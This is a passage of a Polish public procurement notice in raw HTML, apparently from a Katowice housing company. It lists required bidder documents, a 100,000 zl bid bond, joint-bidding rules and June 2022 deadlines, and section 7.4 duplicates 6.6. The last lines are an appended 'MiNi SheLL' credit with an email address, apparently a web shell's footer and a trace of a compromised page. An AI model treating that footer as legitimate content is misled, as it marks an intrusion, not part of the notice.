poddane badaniu – za lata 2017-2019),<br/>a jeżeli okres prowadzenia działalności jest krótszy - za ten okres<br/>4.informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem<br/>5.dokumenty potwierdzające, że wykonawca jest ubezpieczony<br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej<br/>z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">na wezwanie<br/>Zamawiającego, Wykonawca składa:.1. informacji z Krajowego Rejestru Karnego, w zakresie podstaw wykluczenia opisanych w<br/>rozdziale 9 część I punkt 1 i 2, punkt 4 SWZ, sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem<br/>2. oświadczenia wykonawcy, w zakresie podstawy wykluczenia opisanej<br/>w rozdziale 9 część I punkt 5 SWZ, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji<br/>i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – zgodnie z wzorem stanowiącym załącznik nr 7 do<br/>SWZ.<br/>3. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i<br/>opłat,<br/>w zakresie podstawy wykluczenia opisanej w rozdziale 9 część II pkt 1 SWZ, wystawionego nie wcześniej niż 3 miesiące przed jego<br/>złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia<br/>dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w<br/>postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności<br/>4. zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że wykonawca nie zalega<br/>z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie podstawy wykluczenia opisanej w rozdziale 9 część II pkt<br/>1 SWZ, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania<br/>z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert<br/>wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub<br/>zawarł wiążące porozumienie w sprawie spłat tych należności<br/>5. odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie podstawy wykluczenia opisanej w rozdziale 9 część II pkt 2 SWZ, sporządzonych nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji<br/>6. oświadczenia wykonawcy o aktualności informacji zawartych<br/>w oświadczeniu Wykonawcy o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu o udzielenie<br/>zamówienia, o którym mowa<br/>w części I punkt 1, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w rozdziale<br/>9 część I pkt 3, pkt 4<br/>(w zakresie orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego), pkt 5 (w zakresie zawarcia<br/>z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji), pkt 6, rozdziale 9 część II pkt 1 (w zakresie<br/>naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych ), pkt 3-6 SWZ – zgodnie ze wzorem stanowiącym<br/>załącznik nr 11 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia przez Wykonawców wadium zabezpieczającego ofertę<br/>w wysokości100 000,00 zł (sto tysięcy złotych).<br/>2. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert (przez wniesienie wadium<br/>wnoszonego w pieniądzu rozumie się wpływ środków na konto Zamawiającego przed upływem tego terminu; UWAGA: nie<br/>decyduje moment zlecenia przelewu) (przez wniesienie wadium wnoszonego w formie niepieniężnej (gwarancji lub<br/>poręczenia,<br/>o których mowa w ust. 5 pkt 5.2-5.4 poniżej) rozumie się przekazanie niepieniężnej formy wadium w oryginale<br/>Zamawiającemu przed terminem składania ofert – poprzez dołączenie dokumentu<br/>do oferty)<br/>3. Wykonawca zobowiązany jest utrzymywać wadium nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem<br/>przypadków, o których mowa w ust. 11 oraz ust. 12 poniżej.<br/>4. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium<br/>albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą<br/>5. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>5.1. pieniądzu<br/>5.2. gwarancjach bankowych<br/>5.3. gwarancjach ubezpieczeniowych<br/>5.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Jeżeli ofertę składa kilku wykonawców działających<br/>wspólnie, obowiązani są oni ustanowić wspólnego pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania ich<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Do ustanowienia powyższego pełnomocnika stosuje<br/>się w szczególności przepisy art. 98 do art. 109 ustawy z dnia 23 kwietnia 1964 Kodeks cywilny (tekst jednolity: Dz. U. 2020<br/>r. poz. 1740 z późn. zm.).<br/>2. Pełnomocnikiem może być jeden z wykonawców działających wspólnie lub osoba trzecia (np. pracownik jednego z<br/>wykonawców). Jeżeli pełnomocnikiem pozostałych wykonawców jest wykonawca będący osobą prawną to może on działać<br/>zgodnie z ujawnionymi w dokumentach rejestrowych zasadami reprezentacji. Jeżeli pełnomocnikiem jest osoba trzecia, np.<br/>pracownik jednego z wykonawców działających wspólnie, musi on być umocowany przez każdego z wykonawców w drodze<br/>imiennego pełnomocnictwa. W takiej sytuacji każdy z wykonawców działających wspólnie wystawia określonemu<br/>pracownikowi imienne pełnomocnictwo do reprezentowania go w postępowaniu. Jednakże możliwe jest także umocowanie<br/>jednego z wykonawców jako osoby prawnej przez pozostałych wykonawców, z tym, że jeżeli umocowany wykonawca<br/>udziela dalszego pełnomocnictwa swojemu pracownikowi lub innej osobie trzeciej, pełnomocnictwa udzielone temu<br/>wykonawcy muszą wyraźnie uprawniać do udzielenia dalszego pełnomocnictwa. Ponadto pełnomocnictwo udzielone temu<br/>pracownikowi musi wyraźnie wskazywać, iż jest on umocowany do reprezentowania wszystkich wykonawców działających<br/>wspólnie przez wymienienie ich nazw (firm). W takiej sytuacji wszyscy wykonawcy udzielają jednemu z wykonawców wraz z<br/>klauzulą uprawiającą do udzielenia dalszego pełnomocnictwa. Następnie ten wykonawca udziela dalszego pełnomocnictwa<br/>swojemu pracownikowi lub innej sobie trzeciej).<br/>3. Forma pełnomocnictwa została wskazana w rozdziale 14 SWZ.<br/>4. Zamawiający informuje, że podmioty działające w formie spółki cywilnej, uważane są za wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Jeżeli ofertę składa kilku wykonawców działających<br/>wspólnie, obowiązani są oni ustanowić wspólnego pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania ich<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Do ustanowienia powyższego pełnomocnika stosuje<br/>się w szczególności przepisy art. 98 do art. 109 ustawy z dnia 23 kwietnia 1964 Kodeks cywilny (tekst jednolity: Dz. U. 2020<br/>r. poz. 1740 z późn. zm.).<br/>2. Pełnomocnikiem może być jeden z wykonawców działających wspólnie lub osoba trzecia (np. pracownik jednego z<br/>wykonawców). Jeżeli pełnomocnikiem pozostałych wykonawców jest wykonawca będący osobą prawną to może on działać<br/>zgodnie z ujawnionymi w dokumentach rejestrowych zasadami reprezentacji. Jeżeli pełnomocnikiem jest osoba trzecia, np.<br/>pracownik jednego z wykonawców działających wspólnie, musi on być umocowany przez każdego z wykonawców w drodze<br/>imiennego pełnomocnictwa. W takiej sytuacji każdy z wykonawców działających wspólnie wystawia określonemu<br/>pracownikowi imienne pełnomocnictwo do reprezentowania go w postępowaniu. Jednakże możliwe jest także umocowanie<br/>jednego z wykonawców jako osoby prawnej przez pozostałych wykonawców, z tym, że jeżeli umocowany wykonawca<br/>udziela dalszego pełnomocnictwa swojemu pracownikowi lub innej osobie trzeciej, pełnomocnictwa udzielone temu<br/>wykonawcy muszą wyraźnie uprawniać do udzielenia dalszego pełnomocnictwa. Ponadto pełnomocnictwo udzielone temu<br/>pracownikowi musi wyraźnie wskazywać, iż jest on umocowany do reprezentowania wszystkich wykonawców działających<br/>wspólnie przez wymienienie ich nazw (firm). W takiej sytuacji wszyscy wykonawcy udzielają jednemu z wykonawców wraz z<br/>klauzulą uprawiającą do udzielenia dalszego pełnomocnictwa. Następnie ten wykonawca udziela dalszego pełnomocnictwa<br/>swojemu pracownikowi lub innej sobie trzeciej).<br/>3. Forma pełnomocnictwa została wskazana w rozdziale 14 SWZ.<br/>4. Zamawiający informuje, że podmioty działające w formie spółki cywilnej, uważane są za wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/tbs_katowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-28 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-28</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> cena

Creat By MiNi SheLL
Email: jattceo@gmail.com